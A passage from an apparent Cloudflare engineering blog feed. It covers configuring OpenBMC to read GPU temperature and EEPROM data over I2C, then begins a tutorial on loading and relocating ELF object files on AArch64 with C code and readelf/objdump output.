70C, but our intended target was 65 ˚C (if it were to lock in at 70 ˚C, this would be a clear example of steady-state error). The last point we worked to resolve was to improve the speed at which it approaches the setpoint, which we were able to tune with by adjusting proportional gain.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/MX23CfxcUPHg4l72ITUVn/2961f3ef72cd07e21d780e90af5436a6/2148-3.png" />
            
            </figure><p>OpenBMC fan configurations are easily configurable JSON files to manually tune PID settings. The graphs presented come from comma-separated-value (CSV) files generated from OpenBMC’s PID controller application and allow us to easily iterate and improve our configuration. Several iterations later, we got our final product. We had a tad bit of overshoot in the beginning, but this is a strong enough result for us to leave the PID controller for now.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5n47tnZ8vZqTD2fQsIX33W/44690423f9ce2053ea99a875065cfc7c/2148-4.png" />
            
            </figure>
    <div>
      <h2>Talk to me GPU</h2>
      <a href="#talk-to-me-gpu">
        
      </a>
    </div>
    <p>In order to source the temperature data for the PID tuning above, we had to establish communication with the GPU. The first thing we did was identify the route from the BMC to the GPU and Peripheral Component Interconnect Express (PCIe) slot. Looking at our ODM’s schematics for the BMC and motherboard, we found a System Management Bus (SMBus) line to a mux or switch connecting to the PCIe slot. For embedded developers out there, the SMBus protocol is similar to Inter-Integrated Circuit (I2C) bus protocol, with minor differences in electrical and clock speed requirements. With a physical path to communication established, we next needed to communicate with the GPU in software.</p><p>OpenBMC applications, Linux kernel drivers, and the software tools we can add for development make the configuration and operation of devices such as fans, analog-to-digital converters (ADC), and power supplies as simple as possible. The first thing we try as a test is to get some temperature sensor data from the GPU’s onboard temperature sensor and inventory information from the Electrically-Erasable Programmable Read-Only Memory (EEPROM). We can verify the temperature sensor data with tooling provided by our GPU vendor, and the inventory information can be verified against the asset sheet provided to us when the device was delivered. Building the eerpog tool, we can try communicating with the eeprom:</p>
            <pre><code>~$ eeprog -f -16 /dev/i2c-23 0x50 -r 0x00:200
eeprog 0.7.5, a 24Cxx EEPROM reader/writer
Copyright (c) 2003 by Stefano Barbato - All rights reserved.
  Bus: /dev/i2c-23, Address: 0x50, Mode: 16bit
  Reading 200 bytes from 0x0
&lt;redacted&gt; Ver 0.02</code></pre>
            <p>This tool will produce block read requests over SMBus and dump the returned information. For temperature, the TMP75 temperature sensor is commonly used for many temperature sensors in server commodity components. We can manually bind the temperature sensor in sysfs like this:</p><p><code>~$echo "tmp75 0x4F &gt; /sys/bus/i2c/devices/i2c-23/new_device"</code></p><p>This will bind the tmp75 driver to address 0x4F on I2C bus 23, and we can verify the successful binding and sysfs information as seen below:</p><p><code>~$ cat /sys/bus/i2c/devices/i2c-23/23-004f/name tmp75</code></p><p>With our temperature sensor and inventory information, we can now leverage OpenBMC’s applications for simple configuration to make this information available via the Intelligent Platform Management Interface (IPMI) or Redfish, a REST based protocol for communicating with the BMC. For adding these components, we will focus on Entity-Manager.</p><p>Entity-Manager is OpenBMC’s means of making physical components available to the BMC’s software via JSON configuration files. OpenBMC applications refer to information made available with these configurations to make sensor data and inventory data available over BMC interfaces and raise alerts when going out of bounds of critically configured settings. The following is the configuration we use as a result of our discoveries above:</p>
            <pre><code>{
    "Exposes": [
        {
            "Address": "0x4F",
            "Bus": "23",
            "Name": "GPU_TEMP",
            "Thresholds": [
                {
                    "Direction": "greater than",
                    "Name": "upper critical",
                    "Severity": 1,
                    "Value": 92
                },
                {
                    "Direction": "less than",
                    "Name": "lower non critical",
                    "Severity": 0,
                    "Value": 30
                }
            ],
            "Type": "TMP75"
        }
    ],
    "Name": "****************",
    "Probe": "xyz.openbmc_project.FruDevice({'BOARD_PRODUCT_NAME': *********})",
    "Type": "NVMe",
    "xyz.openbmc_project.Inventory.Decorator.Asset": {
        "Manufacturer": "$BOARD_MANUFACTURER",
        "Model": "$BOARD_PRODUCT_NAME",
        "PartNumber": "$BOARD_PART_NUMBER",
        "SerialNumber": "$BOARD_SERIAL_NUMBER"
    }
}</code></pre>
            <p>Entity-Manager probes the I2C buses for all the EEPROMs for inventory information, possibly detailing what’s available on the buses. It will then try to match the information with a given JSON configuration’s “Probe” member, and if there is a match, it will take the configuration and configure the configurations as part of what is exposed. The end result is the FRU and GPU_TEMP available on IPMI.</p>
            <pre><code>$~ ipmi 517m206 sdr |grep GPU_TEMP
GPU_TEMP         | 39 degrees C      | ok
$~ ipmi 517m206 fru print 151
FRU Device Description : &lt;redacted&gt; (ID 151)
 Board Mfg Date        : Mon Mar 27 18:13:00 2023 UTC
 Board Mfg             : &lt;redacted&gt;
 Board Product         : &lt;redacted&gt;
 Board Serial          : &lt;redacted&gt;
 Board Part Number     : &lt;redacted&gt;</code></pre>
            
    <div>
      <h2>Open-Source firmware moving forward</h2>
      <a href="#open-source-firmware-moving-forward">
        
      </a>
    </div>
    <p>Cloudflare has been able to leverage OpenBMC to gain more control and flexibility with our server configurations, without sacrificing the efficiency at the core of our network. While we continue to work closely with our ODM partners, our ongoing GPU deployment has underscored the importance of being able to modify server firmware without being locked to traditional device update cycles.For those who are interested in considering making the jump to open-source firmware, check out OpenBMC <a href="https://github.com/openbmc/openbmc">here</a>!</p> ]]></content:encoded>
            <category><![CDATA[AI]]></category>
            <category><![CDATA[Workers AI]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[Deep Dive]]></category>
            <guid isPermaLink="false">2M0H6i0QI1A4pXsAM6PrWI</guid>
            <dc:creator>Ryan Chow</dc:creator>
            <dc:creator>Giovanni Pereira Zantedeschi</dc:creator>
            <dc:creator>Nnamdi Ajah</dc:creator>
        </item>
        <item>
            <title><![CDATA[How to execute an object file: part 4, AArch64 edition]]></title>
            <link>https://blog.cloudflare.com/how-to-execute-an-object-file-part-4/</link>
            <pubDate>Fri, 17 Nov 2023 14:00:35 GMT</pubDate>
            <description><![CDATA[ The initial posts are dedicated to the x86 architecture. Since then, the fleet of our working machines has expanded to include a large and growing number of ARM CPUs. This time we’ll repeat this exercise for the aarch64 architecture. ]]></description>
            <content:encoded><![CDATA[ 
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5Ih4pvbZshdUy2ihfodYAU/7800842ad2c0270609b36a8a99d0ceb4/image1-1.png" />
            
            </figure><p>Translating source code written in a high-level programming language into an executable binary typically involves a series of steps, namely compiling and assembling the code into object files, and then linking those object files into the final executable. However, there are certain scenarios where it can be useful to apply an alternate approach that involves executing object files directly, bypassing the linker. For example, we might use it for malware analysis or when part of the code requires an incompatible compiler. We’ll be focusing on the latter scenario: when one of our libraries needed to be compiled differently from the rest of the code. Learning how to execute an object file directly will give you a much better sense of how code is compiled and linked together.</p><p>To demonstrate how this was done, we have previously published a series of posts on executing an object file:</p><ul><li><p><a href="/how-to-execute-an-object-file-part-1/">How to execute an object file: Part 1</a></p></li><li><p><a href="/how-to-execute-an-object-file-part-2/">How to execute an object file: Part 2</a></p></li><li><p><a href="/how-to-execute-an-object-file-part-3/">How to execute an object file: Part 3</a></p></li></ul><p>The initial posts are dedicated to the x86 architecture. Since then the fleet of our working machines has expanded to include a large and growing number of ARM CPUs. This time we’ll repeat this exercise for the aarch64 architecture. You can pause here to read the previous blog posts before proceeding with this one, or read through the brief summary below and reference the earlier posts for more detail. We might reiterate some theory as working with ELF files can be daunting, if it’s not your day-to-day routine. Also, please be mindful that for simplicity, these examples omit bounds and integrity checks. Let the journey begin!</p>
    <div>
      <h2>Introduction</h2>
      <a href="#introduction">
        
      </a>
    </div>
    <p>In order to obtain an object file or an executable binary from a high-level compiled programming language the code needs to be processed by three components: compiler, assembler and linker. The compiler generates an assembly listing. This assembly listing is picked up by the assembler and translated into an object file. All source files, if a program contains multiple, go through these two steps generating an object file for each source file. At the final step the linker unites all object files into one binary, additionally resolving references to the shared libraries (i.e. we don’t implement the <code>printf</code> function each time, rather we take it from a system library). Even though the approach is platform independent, the compiler output varies by platform as the assembly listing is closely tied to the CPU architecture.</p><p>GCC (GNU Compiler Collection) can run each step: compiler, assembler and linker separately for us:</p><p>main.c:</p>
            <pre><code>#include &lt;stdio.h&gt;

int main(void)
{
	puts("Hello, world!");
	return 0;
}</code></pre>
            <p>Compiler (output <code>main.s</code> - assembly listing):</p>
            <pre><code>$ gcc -S main.c
$ ls
main.c  main.s</code></pre>
            <p>Assembler (output <code>main.o</code> - an object file):</p>
            <pre><code>$ gcc -c main.s -o main.o
$ ls
main.c  main.o  main.s</code></pre>
            <p>Linker (<code>main</code> - an object file):</p>
            <pre><code>$ gcc main.o -o main
$ ls
main  main.c  main.o  main.s
$ ./main
Hello, world!</code></pre>
            <p>All the examples assume gcc is running on a native aarch64 architecture or include a cross compilation flag for those who want to reproduce and have no aarch64.</p><p>We have two object files in the output above: <code>main.o</code> and <code>main</code>. Object files are files encoded with the <a href="https://en.wikipedia.org/wiki/Executable_and_Linkable_Format">ELF (Executable and Linkable Format)</a> standard. Although, <code>main.o</code> is an ELF file, it doesn’t contain all the information to be fully executable.</p>
            <pre><code>$ file main.o
main.o: ELF 64-bit LSB relocatable, ARM aarch64, version 1 (SYSV), not stripped

$ file main
main: ELF 64-bit LSB pie executable, ARM aarch64, version 1 (SYSV), dynamically
linked, interpreter /lib/ld-linux-aarch64.so.1,
BuildID[sha1]=d3ecd2f8ac3b2dec11ed4cc424f15b3e1f130dd4, for GNU/Linux 3.7.0, not stripped</code></pre>
            
    <div>
      <h2>The ELF File</h2>
      <a href="#the-elf-file">
        
      </a>
    </div>
    <p>The central idea of this series of blog posts is to understand how to resolve dependencies from object files without directly involving the linker. For illustrative purposes we generated an object file based on some C-code and used it as a library for our main program. Before switching to the code, we need to understand the basics of the ELF structure.</p><p>Each ELF file is made up of one <i>ELF header</i>, followed by file data. The data can include: a <i>program header</i> table, a <i>section header</i> table, and the data which is referred to by the program or section header tables.</p>
    <div>
      <h3>The ELF Header</h3>
      <a href="#the-elf-header">
        
      </a>
    </div>
    <p>The ELF header provides some basic information about the file: what architecture the file is compiled for, the program entry point and the references to other tables.</p><p>The ELF Header:</p>
            <pre><code>$ readelf -h main
ELF Header:
  Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 
  Class:                             ELF64
  Data:                              2's complement, little endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              DYN (Position-Independent Executable file)
  Machine:                           AArch64
  Version:                           0x1
  Entry point address:               0x640
  Start of program headers:          64 (bytes into file)
  Start of section headers:          68576 (bytes into file)
  Flags:                             0x0
  Size of this header:               64 (bytes)
  Size of program headers:           56 (bytes)
  Number of program headers:         9
  Size of section headers:           64 (bytes)
  Number of section headers:         29
  Section header string table index: 28</code></pre>
            
    <div>
      <h3>The ELF Program Header</h3>
      <a href="#the-elf-program-header">
        
      </a>
    </div>
    <p>The execution process of almost every program starts from an auxiliary program, called loader, which arranges the memory and calls the program’s entry point. In the following output the loader is marked with a line <code>“Requesting program interpreter: /lib/ld-linux-aarch64.so.1”</code>. The whole program memory is split into different segments with associated size, permissions and type (which instructs the loader on how to interpret this block of memory). Because the execution process should be performed in the shortest possible time, the <i>sections</i> with the same characteristics and located nearby are grouped into bigger blocks — <i>segments</i> — and placed in the <i>program header</i>. We can say that the <i>program header</i> summarizes the types of data that appear in the <i>section header</i>.</p><p>The ELF Program Header:</p>
            <pre><code>$ readelf -Wl main

Elf file type is DYN (Position-Independent Executable file)
Entry point 0x640
There are 9 program headers, starting at offset 64

Program Headers:
  Type           Offset   VirtAddr           PhysAddr           FileSiz  MemSiz   Flg Align
  PHDR           0x000040 0x0000000000000040 0x0000000000000040 0x0001f8 0x0001f8 R   0x8
  INTERP         0x000238 0x0000000000000238 0x0000000000000238 0x00001b 0x00001b R   0x1
      [Requesting program interpreter: /lib/ld-linux-aarch64.so.1]
  LOAD           0x000000 0x0000000000000000 0x0000000000000000 0x00088c 0x00088c R E 0x10000
  LOAD           0x00fdc8 0x000000000001fdc8 0x000000000001fdc8 0x000270 0x000278 RW  0x10000
  DYNAMIC        0x00fdd8 0x000000000001fdd8 0x000000000001fdd8 0x0001e0 0x0001e0 RW  0x8
  NOTE           0x000254 0x0000000000000254 0x0000000000000254 0x000044 0x000044 R   0x4
  GNU_EH_FRAME   0x0007a0 0x00000000000007a0 0x00000000000007a0 0x00003c 0x00003c R   0x4
  GNU_STACK      0x000000 0x0000000000000000 0x0000000000000000 0x000000 0x000000 RW  0x10
  GNU_RELRO      0x00fdc8 0x000000000001fdc8 0x000000000001fdc8 0x000238 0x000238 R   0x1

 Section to Segment mapping:
  Segment Sections...
   00     
   01     .interp 
   02     .interp .note.gnu.build-id .note.ABI-tag .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt .init .plt .text .fini .rodata .eh_frame_hdr .eh_frame 
   03     .init_array .fini_array .dynamic .got .got.plt .data .bss 
   04     .dynamic 
   05     .note.gnu.build-id .note.ABI-tag 
   06     .eh_frame_hdr 
   07     
   08     .init_array .fini_array .dynamic .got </code></pre>
            
    <div>
      <h3>The ELF Section Header</h3>
      <a href="#the-elf-section-header">
        
      </a>
    </div>
    <p>In the source code of high-level languages, variables, functions, and constants are mixed together. However, in assembly you might see that the data and instructions are separated into different blocks. The ELF file content is divided in an even more granular way. For example, variables with initial values are placed into different sections than the uninitialized ones. This approach optimizes for space, otherwise the values for uninitialized variables would be filled with zeros. Along with the space efficiency, there are security reasons for stratification — executable instructions can’t have writable permissions, while memory containing variables can't be executable. The section header describes each of these sections.</p><p>The ELF Section Header:</p>
            <pre><code>$ readelf -SW main
There are 29 section headers, starting at offset 0x10be0:

Section Headers:
  [Nr] Name              Type            Address          Off    Size   ES Flg Lk Inf Al
  [ 0]                   NULL            0000000000000000 000000 000000 00      0   0  0
  [ 1] .interp           PROGBITS        0000000000000238 000238 00001b 00   A  0   0  1
  [ 2] .note.gnu.build-id NOTE            0000000000000254 000254 000024 00   A  0   0  4
  [ 3] .note.ABI-tag     NOTE            0000000000000278 000278 000020 00   A  0   0  4
  [ 4] .gnu.hash         GNU_HASH        0000000000000298 000298 00001c 00   A  5   0  8
  [ 5] .dynsym           DYNSYM          00000000000002b8 0002b8 0000f0 18   A  6   3  8
  [ 6] .dynstr           STRTAB          00000000000003a8 0003a8 000092 00   A  0   0  1
  [ 7] .gnu.version      VERSYM          000000000000043a 00043a 000014 02   A  5   0  2
  [ 8] .gnu.version_r    VERNEED         0000000000000450 000450 000030 00   A  6   1  8
  [ 9] .rela.dyn         RELA            0000000000000480 000480 0000c0 18   A  5   0  8
  [10] .rela.plt         RELA            0000000000000540 000540 000078 18  AI  5  22  8
  [11] .init             PROGBITS        00000000000005b8 0005b8 000018 00  AX  0   0  4
  [12] .plt              PROGBITS        00000000000005d0 0005d0 000070 00  AX  0   0 16
  [13] .text             PROGBITS        0000000000000640 000640 000134 00  AX  0   0 64
  [14] .fini             PROGBITS        0000000000000774 000774 000014 00  AX  0   0  4
  [15] .rodata           PROGBITS        0000000000000788 000788 000016 00   A  0   0  8
  [16] .eh_frame_hdr     PROGBITS        00000000000007a0 0007a0 00003c 00   A  0   0  4
  [17] .eh_frame         PROGBITS        00000000000007e0 0007e0 0000ac 00   A  0   0  8
  [18] .init_array       INIT_ARRAY      000000000001fdc8 00fdc8 000008 08  WA  0   0  8
  [19] .fini_array       FINI_ARRAY      000000000001fdd0 00fdd0 000008 08  WA  0   0  8
  [20] .dynamic          DYNAMIC         000000000001fdd8 00fdd8 0001e0 10  WA  6   0  8
  [21] .got              PROGBITS        000000000001ffb8 00ffb8 000030 08  WA  0   0  8
  [22] .got.plt          PROGBITS        000000000001ffe8 00ffe8 000040 08  WA  0   0  8
  [23] .data             PROGBITS        0000000000020028 010028 000010 00  WA  0   0  8
  [24] .bss              NOBITS          0000000000020038 010038 000008 00  WA  0   0  1
  [25] .comment          PROGBITS        0000000000000000 010038 00001f 01  MS  0   0  1
  [26] .symtab           SYMTAB          0000000000000000 010058 000858 18     27  66  8
  [27] .strtab           STRTAB          0000000000000000 0108b0 00022c 00      0   0  1
  [28] .shstrtab         STRTAB          0000000000000000 010adc 000103 00      0   0  1
Key to Flags:
  W (write), A (alloc), X (execute), M (merge), S (strings), I (info),
  L (link order), O (extra OS processing required), G (group), T (TLS),
  C (compressed), x (unknown), o (OS specific), E (exclude),
  D (mbind), p (processor specific)</code></pre>
            
    <div>
      <h2>Executing example from Part 1 on aarch64</h2>
      <a href="#executing-example-from-part-1-on-aarch64">
        
      </a>
    </div>
    <p>Actually, our <a href="https://github.com/cloudflare/cloudflare-blog/tree/master/2021-03-obj-file/1">initial code</a> from <a href="/how-to-execute-an-object-file-part-1/">Part 1</a> works on aarch64 as is!</p><p>Let’s have a quick summary about what was done in the code:</p><ol><li><p>We need to find the code of two functions (<code>add5</code> and <code>add10</code>) in the <code>.text</code> section of our object file (<code>obj.o</code>)</p></li><li><p>Load the functions in the executable memory</p></li><li><p>Return the memory locations of the functions to the main program</p></li></ol><p>There is one nuance: even though all the sections are in the section header, neither of them have a string name. Without the names we can’t identify them. However, having an additional character field for each section in the ELF structure would be inefficient for the space — it must be limited by some maximum length and those names which are shorter would leave the space unfilled. Instead, ELF provides an additional section, <code>.shstrtab</code>. This string table concatenates all the names where each name ends with a null terminated byte. We can iterate over the names and match with an offset held by other sections to reference their name. But how do we find <code>.shstrtab</code> itself if we don’t have a name? To solve this chicken and egg problem, the ELF program header provides a direct pointer to <code>.shstrtab</code>. The similar approach is applied to two other sections: <code>.symtab</code> and <code>.strtab</code>. Where <code>.symtab</code> contains all information about the symbols and <code>.strtab</code> holds the list of symbol names. In the code we work with these tables to resolve all their dependencies and find our functions.</p>
    <div>
      <h2>Executing example from Part 2 on aarch64</h2>
      <a href="#executing-example-from-part-2-on-aarch64">
        
      </a>
    </div>
    <p>At the beginning of the second blog post on <a href="/how-to-execute-an-object-file-part-2/">how to execute an object file</a> we made the function <code>add10</code> depend on <code>add5</code> instead of being self-contained. This is the first time when we faced relocations. <i>Relocations</i> is the process of loading symbols defined outside the current scope. The relocated symbols can present global or thread-local variables, constant, functions, etc. We’ll start from checking assembly instructions which trigger relocations and uncovering how the ELF format handles them in a more general way.</p><p>After making <code>add10</code> depend on <code>add5</code> our aarch64 version stopped working as well, similarly to the x86. Let’s take a look at assembly listing:</p>
            <pre><code>$ objdump --disassemble --section=.text obj.o

obj.o:     file format elf64-littleaarch64


Disassembly of section .text:

0000000000000000 &lt;add5&gt;:
   0:	d10043ff 	sub	sp, sp, #0x10
   4:	b9000fe0 	str	w0, [sp, #12]
   8:	b9400fe0 	ldr	w0, [sp, #12]
   c:	11001400 	add	w0, w0, #0x5
  10:	910043ff 	add	sp, sp, #0x10
  14:	d65f03c0 	ret

0000000000000018 &lt;add10&gt;:
  18:	a9be7bfd 	stp	x29, x30, [sp, #-32]!
  1c:	910003fd 	mov	x29, sp
  20:	b9001fe0 	str	w0, [sp, #28]
  24:	b9401fe0 	ldr	w0, [sp, #28]
  28:	94000000 	bl	0 &lt;add5&gt;
  2c:	b9001fe0 	str	w0, [sp, #28]
  30:	b9401fe0 	ldr	w0, [sp, #28]
  34:	94000000 	bl	0 &lt;add5&gt;
  38:	a8c27bfd 	ldp	x29, x30, [sp], #32
  3c:	d65f03c0 	ret</code></pre>
            <p>Have you noticed that all the hex values in the second column are exactly the same length, in contrast with the instructions lengths seen for x86 in Part 2 of our series? This is because all Armv8-A instructions are presented in 32 bits. Since it is impossible to encode every immediate value into less than 32 bits, some operations require more than one instruction, as we’ll see later. For now, we’re interested in one instruction <code>- bl</code> (<a href="https://developer.arm.com/documentation/ddi0596/2021-12/Base-Instructions/BL--Branch-with-Link-?lang=en">branch with link</a>) on rows <code>28</code> and <code>34</code>. The <code>bl</code> is a “jump” instruction, but before the jump it preserves the next instruction after the current one in the link register (<code>lr</code>). When the callee finishes execution the caller address is recovered from <code>lr</code>. Usually, the aarch64 instructions reserve the last 6 bits [31:26] for opcode and some auxiliary fields such as running architecture (32 or 64 bits), condition flag and others. Remaining bits are shared between arguments like source register, destination register and immediate value. Since the <code>bl</code> instruction does not require a source or destination register, the full 26 bits can be used to encode the immediate offset instead. However, 26 bits can only encode a small range (+/-32 MB), but because the jump can only target a beginning of an instruction, it must always be aligned to 4 bytes, which increases the effective range of the encoded immediate fourfold, to +/-128 MB.</p><p>Similarly to what we did in <a href="/how-to-execute-an-object-file-part-2/">Part 2</a> we’re going to resolve our relocations - first by manually calculating the correct addresses and then by using an approach similar to what the linker does. The current value of our <code>bl</code> instruction is <code>94000000</code> or in binary representation <code>100101**00000000000000000000000000**</code>. All 26 bits are zeros, so we don't jump anywhere. The address is calculated by an offset from the current <i>program counter</i> (<code>pc</code>), which can be positive or negative. In our case we expect it to be <code>-0x28</code> and <code>-0x34</code>. As described above, it should be divided by 4 and taken as <a href="https://en.wikipedia.org/wiki/Two%27s_complement">two's complements</a>: <code>-0x28 / 4 = -0xA == 0xFFFFFFF6</code> and <code>-0x34 / 4 = -0xD == 0xFFFFFFF3</code>. From these values we need to take the lower 26 bits and concatenate them with the initial 6 bits to get the final instruction. So, the final ones will be: <code>100101**11111111111111111111110110** == 0x97FFFFF6</code> and <code>100101**11111111111111111111110011** == 0x97FFFFF3</code>. Have you noticed that all the distance calculations are done relative to the <code>bl</code> (or current <code>pc</code>), not the next instruction as in x86?</p><p>Let’s add to the code and execute:</p>
            <pre><code>... 

static void parse_obj(void)
{
	...
	/* copy the contents of `.text` section from the ELF file */
	memcpy(text_runtime_base, obj.base + text_hdr-&gt;sh_offset, text_hdr-&gt;sh_size);

	*((uint32_t *)(text_runtime_base + 0x28)) = 0x97FFFFF6;
	*((uint32_t *)(text_runtime_base + 0x34)) = 0x97FFFFF3;

	/* make the `.text` copy readonly and executable */
	if (mprotect(text_runtime_base, page_align(text_hdr-&gt;sh_size), PROT_READ | PROT_EXEC)) {
	...</code></pre>
            <p>Compile and run:</p>
            <pre><code>$ gcc -o loader loader.c
$ ./loader
Executing add5...
add5(42) = 47
Executing add10...
add10(42) = 52</code></pre>
            <p>It works! But this is not how the linker handles the relocations. The linker resolves relocation based on the type and formula assigned to this type. In our <a href="/how-to-execute-an-object-file-part-2/">Part 2</a> we investigated it quite well. Here again we need to find the type and check the formula for this type:</p>
            <pre><code>$ readelf --relocs obj.o

Relocation section '.rela.text' at offset 0x228 contains 2 entries:
  Offset          Info           Type           Sym. Value    Sym. Name + Addend
000000000028  000a0000011b R_AARCH64_CALL26  0000000000000000 add5 + 0
000000000034  000a0000011b R_AARCH64_CALL26  0000000000000000 add5 + 0

Relocation section '.rela.eh_frame' at offset 0x258 contains 2 entries:
  Offset          Info           Type           Sym. Value    Sym. Name + Addend
00000000001c  000200000105 R_AARCH64_PREL32  0000000000000000 .text + 0
000000000034  000200000105 R_AARCH64_PREL32  0000000000000000 .text + 18</code></pre>
            <p>Our Type is R_AARCH64_CALL26 and the <a href="https://github.com/ARM-software/abi-aa/blob/main/aaelf64/aaelf64.rst#5733relocation-operations">formula</a> for it is:</p><table>
	<tbody>
		<tr>
			<td>
			<p><span><span><span><b>ELF64 Code</b></span></span></span></p>
			</td>
			<td>
			<p><span><span><span><b>Name</b></span></span></span></p>
			</td>
			<td>
			<p><span><span><span><b>Operation</b></span></span></span></p>
			</td>
		</tr>
		<tr>
			<td>
			<p><span><span><span>283</span></span></span></p>
			</td>
			<td>
			<p><span><span><span>R_&lt;CLS&gt;_CALL26</span></span></span></p>
			</td>
			<td>
			<p><span><span><span>S + A - P</span></span></span></p>
			</td>
		</tr>
	</tbody>
</table><p>where:</p><ul><li><p><code>S</code> (when used on its own) is the address of the symbol</p></li><li><p><code>A</code> is the addend for the relocation</p></li><li><p><code>P</code> is the address of the place being relocated (derived from <code>r_offset</code>)</p></li></ul><p>Here are the relevant changes to loader.c:</p>
            <pre><code>/* Replace `#define R_X86_64_PLT32 4` with our Type */
#define R_AARCH64_CALL26 283
...

static void do_text_relocations(void)
{
	...
	uint32_t val;

	switch (type)
	{
	case R_AARCH64_CALL26:
		/* The mask separates opcode (6 bits) and the immediate value */
		uint32_t mask_bl = (0xffffffff &lt;&lt; 26);
		/* S+A-P, divided by 4 */
		val = (symbol_address + relocations[i].r_addend - patch_offset) &gt;&gt; 2;
		/* Concatenate opcode and value to get final instruction */
		*((uint32_t *)patch_offset) &amp;= mask_bl;
		val &amp;= ~mask_bl;
		*((uint32_t *)patch_offset) |= val;
		break;
	}
	...
}</code></pre>
            <p>Compile and run:</p>
            <pre><code>$ gcc -o loader loader.c 
$ ./loader
Calculated relocation: 0x97fffff6
Calculated relocation: 0x97fffff3
Executing add5...
add5(42) = 47
Executing add10...
add10(42) = 52</code></pre>
            <p>So far so good. The next challenge is to <a href="https://github.com/cloudflare/cloudflare-blog/blob/master/2021-03-obj-file/2/obj.c#L16-L31">add constant data and global variables</a> to our object file and check relocations again:</p>
            <pre><code>$ readelf --relocs --wide obj.o

Relocation section '.rela.text' at offset 0x388 contains 8 entries:
    Offset             Info             Type               Symbol's Value  Symbol's Name + Addend
0000000000000000  0000000500000113 R_AARCH64_ADR_PREL_PG_HI21 0000000000000000 .rodata + 0
0000000000000004  0000000500000115 R_AARCH64_ADD_ABS_LO12_NC 0000000000000000 .rodata + 0
000000000000000c  0000000300000113 R_AARCH64_ADR_PREL_PG_HI21 0000000000000000 .data + 0
0000000000000010  0000000300000115 R_AARCH64_ADD_ABS_LO12_NC 0000000000000000 .data + 0
0000000000000024  0000000300000113 R_AARCH64_ADR_PREL_PG_HI21 0000000000000000 .data + 0
0000000000000028  0000000300000115 R_AARCH64_ADD_ABS_LO12_NC 0000000000000000 .data + 0
0000000000000068  000000110000011b R_AARCH64_CALL26       0000000000000040 add5 + 0
0000000000000074  000000110000011b R_AARCH64_CALL26       0000000000000040 add5 + 0
...</code></pre>
            <p>We have even two new relocations: <code>R_AARCH64_ADD_ABS_LO12_NC</code> and <code>R_AARCH64_ADR_PREL_PG_HI21</code>. Their formulas are:</p><table>
	<tbody>
		<tr>
			<td>
			<p><span><span><span><b>ELF64 Code</b></span></span></span></p>
			</td>
			<td>
			<p><span><span><span><b>Name</b></span></span></span></p>
			</td>
			<td>
			<p><span><span><span><b>Operation</b></span></span></span></p>
			</td>
		</tr>
		<tr>
			<td>
			<p><span><span><span><span>275</span></span></span></span></p>
			</td>
			<td>
			<p><span><span><span><span>R_&lt;CLS&gt;_ ADR_PREL_PG_HI21</span></span></span></span></p>
			</td>
			<td>
			<p><span><span><span><span>Page(S+A) - Page(P)</span></span></span></span></p>
			</td>
		</tr>
		<tr>
			<td>
			<p><span><span><span>277</span></span></span></p>
			</td>
			<td>
			<p><span><span><span>R_&lt;CLS&gt;_ ADD_ABS_LO12_NC</span></span></span></p>
			</td>
			<td>
			<p><span><span><span>S + A</span></span></span></p>
			</td>
		</tr>
	</tbody>
</table><p>where:</p><p><code>Page(expr)</code> is the page address of the expression expr, defined as <code>(expr &amp; ~0xFFF)</code>. (This applies even if the machine page size supported by the platform has a different value.)</p><p>It’s a bit unclear why we have two new types, while in x86 we had only one. Let’s investigate the assembly code:</p>
            <pre><code>$ objdump --disassemble --section=.text obj.o

obj.o:     file format elf64-littleaarch64


Disassembly of section .text:

0000000000000000 &lt;get_hello&gt;:
   0:	90000000 	adrp	x0, 0 &lt;get_hello&gt;
   4:	91000000 	add	x0, x0, #0x0
   8:	d65f03c0 	ret

000000000000000c &lt;get_var&gt;:
   c:	90000000 	adrp	x0, 0 &lt;get_hello&gt;
  10:	91000000 	add	x0, x0, #0x0
  14:	b9400000 	ldr	w0, [x0]
  18:	d65f03c0 	ret

000000000000001c &lt;set_var&gt;:
  1c:	d10043ff 	sub	sp, sp, #0x10
  20:	b9000fe0 	str	w0, [sp, #12]
  24:	90000000 	adrp	x0, 0 &lt;get_hello&gt;
  28:	91000000 	add	x0, x0, #0x0
  2c:	b9400fe1 	ldr	w1, [sp, #12]
  30:	b9000001 	str	w1, [x0]
  34:	d503201f 	nop
  38:	910043ff 	add	sp, sp, #0x10
  3c:	d65f03c0 	ret</code></pre>
            <p>We see that all <code>adrp</code> instructions are followed by <code>add</code> instructions. The <code>[add](https://developer.arm.com/documentation/ddi0596/2021-12/Base-Instructions/ADD--immediate---Add--immediate--?lang=en)</code> instruction adds an immediate value to the source register and writes the result to the destination register. The source and destination registers can be the same, the immediate value is 12 bits. The <code>[adrp](https://developer.arm.com/documentation/ddi0596/2021-12/Base-Instructions/ADRP--Form-PC-relative-address-to-4KB-page-?lang=en)</code> instruction generates a <code>pc</code>-relative (program counter) address and writes the result to the destination register. It takes <code>pc</code> of the instruction itself and adds a 21-bit immediate value shifted left by 12 bits. If the immediate value weren’t shifted it would lie in a range of +/-1 MB memory, which isn’t enough. The left shift increases the range up to +/-1 GB. However, because the 12 bits are masked out with the shift, we need to store them somewhere and restore later. That’s why we see add instruction following <code>adrp</code> and two types instead of one. Also, it’s a bit tricky to encode <a href="https://developer.arm.com/documentation/ddi0596/2021-12/Base-Instructions/ADRP--Form-PC-relative-address-to-4KB-page-?lang=en"><code>adrp</code></a>: 2 low bits of immediate value are placed in the position 30:29 and the rest in the position 23:5. Due to size limitations, the aarch64 instructions try to make the most out of 32 bits.</p><p>In the code we are going to use the formulas to calculate the values and description of <code>adrp</code> and <code>add</code> instructions to obtain the final opcode:</p>
            <pre><code>#define R_AARCH64_CALL26 283
#define R_AARCH64_ADD_ABS_LO12_NC 277
#define R_AARCH64_ADR_PREL_PG_HI21 275
...

{
case R_AARCH64_CALL26:
	/* The mask separates opcode (6 bits) and the immediate value */
	uint32_t mask_bl = (0xffffffff &lt;&lt; 26);
	/* S+A-P, divided by 4 */
	val = (symbol_address + relocations[i].r_addend - patch_offset) &gt;&gt; 2;
